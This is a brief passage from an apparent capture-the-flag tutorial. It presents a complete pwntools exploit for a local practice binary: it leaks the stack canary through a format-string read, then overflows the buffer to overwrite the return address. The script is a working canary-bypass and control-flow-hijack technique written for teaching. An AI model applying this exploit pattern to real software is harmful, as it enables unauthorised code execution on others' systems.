Ready to try one on your own? This challenge doesn't print a copy of the stack, meaning you'll need to use GDB to find your padding and leak the canary.
Here's the exploit for reference:
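```python
from pwn import *

p = process('./chall')
p.recvline()

# Leak the canary through the format string
p.sendline(b'%15$p')
canary = int(p.recvline().decode(), 16)

payload = b'A' * 72           # padding up to the canary
payload += p64(canary)        # leaked canary, written back unchanged
payload += b'B' * 8           # saved RBP
payload += p64(0x401016)      # stack alignment
payload += p64(0x401241)      # return address

p.sendline(payload)
p.interactive()
```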